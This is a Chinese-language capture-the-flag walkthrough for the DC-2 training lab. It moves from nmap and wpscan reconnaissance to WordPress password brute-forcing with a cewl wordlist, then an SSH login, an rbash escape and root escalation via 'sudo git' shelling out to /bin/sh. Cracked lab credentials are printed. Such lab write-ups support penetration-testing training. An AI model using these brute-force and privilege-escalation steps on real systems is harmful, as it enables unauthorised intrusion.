DC-2靶场实验测试
步骤一:环境搭建:
与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始。
和DC-1一样,有五个flag
下载靶场环境
靶场下载地址:
步骤二:搭建靶场,靶场IP为:xxx.xxx.xxx.xxx/24
开始寻找真实靶场IP:nmap -sP 192.168.132.132
步骤三:探端口及服务:nmap -A -p- -v 192.168.132.132
步骤四:访问web站点
http:// 192.168.132.132
访问后会发现访问不了,这时我盟需要输入
vim /etc/hosts
添加完成之后,再次访问,访问成功
可以很明显的发现这是一个wordpress的站点,发现flag1
步骤五:做一个目录扫描
dirb http://dc-2/
发现疑似后台地址
打开后进入到登录页面
步骤六:用户名枚举
Wpscan一些常用语句:
wpscan --url http://dc-2
wpscan --url http://dc-2 --enumerate t 扫描主题
wpscan --url http://dc-2 --enumerate p 扫描插件
wpscan --url http://dc-2 --enumerate u 枚举用户
扫描wordpress版本
wpscan --url http://dc-2
发现wordpress的版本4.7.10
登录页面尝试登录
随即输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举
首先来个用户枚举,再尝试利用枚举到的用户爆破密码
wpscan --url http://dc-2 --enumerate u
枚举出三个用户名:admin jerry tom
步骤七:暴力破解出账号密码
cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt
使用wpscan进行暴力破解
wpscan --url http://dc-2 --passwords dict.txt
爆破出来两个账号
jerry/adipiscing
tom/parturient 00
步骤八:jerry/adipiscing登录此站点
tom/parturient登陆此站点
发现flag2:登录后台之后,我们看到flag2,我用的是jerry的账号
点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh
在tom的家目录发现flag3
jerry/adipiscing
tom/parturient
步骤九:登录ssh
ssh tom@192.168.66.141 -p 7744
在tom账号的家目录 发现flag3
cat用不了
我这里把查看命令都尝试了一遍 less和vi可以来查看,
提示内容如下
接下来,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642
查看可以使用的命令
echo $PATH
cd进不去目录 使用ls直接查看目录信息
使用echo来绕过rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
步骤十:在jerry的家目录发现flag4
看到提示信息如下:
Good to see that you've made it this far - but you " re not home yet .
很高兴看到你走了这么远,但你还没回家。
You still need to get the final flag (the only flag that really counts!!! ).
您仍然需要获得最后的标志(唯一真正重要的标志!)
No hints here 一you're on your own now. :- )
这里没有暗示,一,你现在只能靠自己了。*-)
Go on
继续
git outta here!!!!
大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权
使用tom用户无权限运行sudo 我们切换到jerry用户
我们可以看到无需root权限,jerry 可以使用 git
步骤十一:提权
查看一下可以使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null
jerry用户也不可以直接sudo su
使用git命令进行提取
sudo git help status
输入!/bin/sh,直接输入就行
提权成功
步骤十二:发现final-flag.txt
cd /root
cat final-flag.txt